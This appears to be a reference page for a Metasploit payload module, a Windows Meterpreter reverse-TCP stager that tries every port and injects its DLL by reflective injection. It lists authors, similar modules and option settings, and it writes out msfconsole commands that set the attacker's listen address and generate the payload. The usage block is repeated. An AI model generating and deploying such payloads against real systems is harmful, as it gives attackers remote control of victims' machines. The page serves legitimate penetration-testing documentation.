Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
Rank
- Normal
Authors
- skape < mmiller [at] hick.org >
- sf < stephen_fewer [at] harmonysecurity.com >
- hdm < hdm [at] metasploit.com >
Vulnerability References
Similar Modules
- payload/windows/meterpreter/bind_ipv6_tcp
- payload/windows/meterpreter/bind_nonx_tcp
- payload/windows/meterpreter/bind_tcp
- payload/windows/meterpreter/find_tag
- payload/windows/meterpreter/reverse_http
- payload/windows/meterpreter/reverse_https
- payload/windows/meterpreter/reverse_ipv6_http
- payload/windows/meterpreter/reverse_ipv6_https
- payload/windows/meterpreter/reverse_ipv6_tcp
- payload/windows/meterpreter/reverse_nonx_tcp
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use payload/windows/meterpreter/reverse_tcp_allports
msf payload(reverse_tcp_allports) > set LHOST [MY IP ADDRESS]
msf payload(reverse_tcp_allports) > generate
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use payload/windows/meterpreter/reverse_tcp_allports
msf payload(reverse_tcp_allports) > set LHOST [MY IP ADDRESS]
msf payload(reverse_tcp_allports) > generate
Module Options
| EXITFUNC | Exit technique: thread, seh, none, process (default: process) |
| LHOST | The listen address |
| LPORT | The starting port number to connect back on (default: 1) |
| AutoLoadStdapi | Automatically load the Stdapi extension |
| AutoRunScript | A script to run automatically on session creation. |
| AutoSystemInfo | Automatically capture system information on initialization. |
| EnableUnicodeEncoding | Automatically encode UTF-8 strings as hexadecimal |
| InitialAutoRunScript | An initial script to run on session creation (before AutoRunScript) |
| ReverseConnectRetries | The number of connection attempts to try before exiting the process |
| ReverseListenerBindAddress | The specific IP address to bind to on the local system |
| ReverseListenerComm | The specific communication channel to use for this listener |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |